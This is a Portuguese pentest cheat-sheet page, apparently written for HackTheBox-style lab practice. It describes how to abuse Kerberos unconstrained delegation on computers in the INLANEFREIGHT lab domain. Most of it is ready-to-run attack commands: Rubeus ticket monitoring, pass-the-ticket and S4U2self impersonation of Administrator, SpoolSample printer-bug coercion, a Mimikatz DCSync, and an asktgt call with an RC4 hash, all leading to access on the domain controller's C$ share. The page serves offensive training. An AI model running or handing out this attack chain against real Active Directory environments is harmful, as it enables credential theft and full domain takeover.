LinkedinTryHackme

Unconstrained Delegation - Computers

Conceito

  • Unconstrained Delegation era o único tipo de delegação disponível no Windows 2000.

  • Quando um usuário solicita um ticket de serviço para um servidor com delegação irrestrita habilitada, o TGT do usuário é incluído no ticket de serviço.

  • Isso permite que um atacante que comprometa esse servidor abuse desses tickets.

Enumeração

  • Grupos e membros

Import-Module .\PowerView.ps1
Get-DomainGroup -MemberIdentity sarah.lafferty

Captura e Monitoramento de Tickets

  • Monitorar tickets armazenados

.\Rubeus.exe monitor /interval:5 /nowrap

Abuso de Tickets

  • Solicitar outro ticket com um TGT

.\Rubeus.exe asktgs /ticket:<TICKET> /service:cifs/dc01.INLANEFREIGHT.local /ptt

  • Renovar ticket

.\Rubeus.exe renew /ticket:<TICKET> /ptt

  • Usar ticket para acesso

dir \\dc01.inlanefreight.local\c$

Printer Bug (Spooler)

  • Monitorar tickets em um terminal

.\Rubeus.exe monitor /interval:5 /nowrap

  • Executar ataque de spooler em outro terminal

.\SpoolSample.exe dc01.inlanefreight.local sql01.inlanefreight.local

DCSync com Mimikatz

mimikatz.exe
lsadump::dcsync /user:sarah.lafferty

Rubeus – Solicitação de TGT direto

  • Solicitar TGT com hash RC4 de Sarah

.\Rubeus.exe asktgt /rc4:0fcb586d2aec31967c8a310d1ac2bf50 /user:sarah.lafferty /ptt

Acesso ao DC com ticket de Sarah

dir \\dc01.inlanefreight.local\c$

S4U2self / Impersonação

  • Impersonar Administrator com S4U2self

.\Rubeus.exe s4u /self /nowrap /impersonateuser:Administrator /altservice:CIFS/dc01.inlanefreight.local /ptt /ticket:<TICKET>

  • Usar acesso

ls \\dc01.inlanefreight.local\c$
PreviousKerberoasting from LinuxNextUnconstrained Delegation - Users

Last updated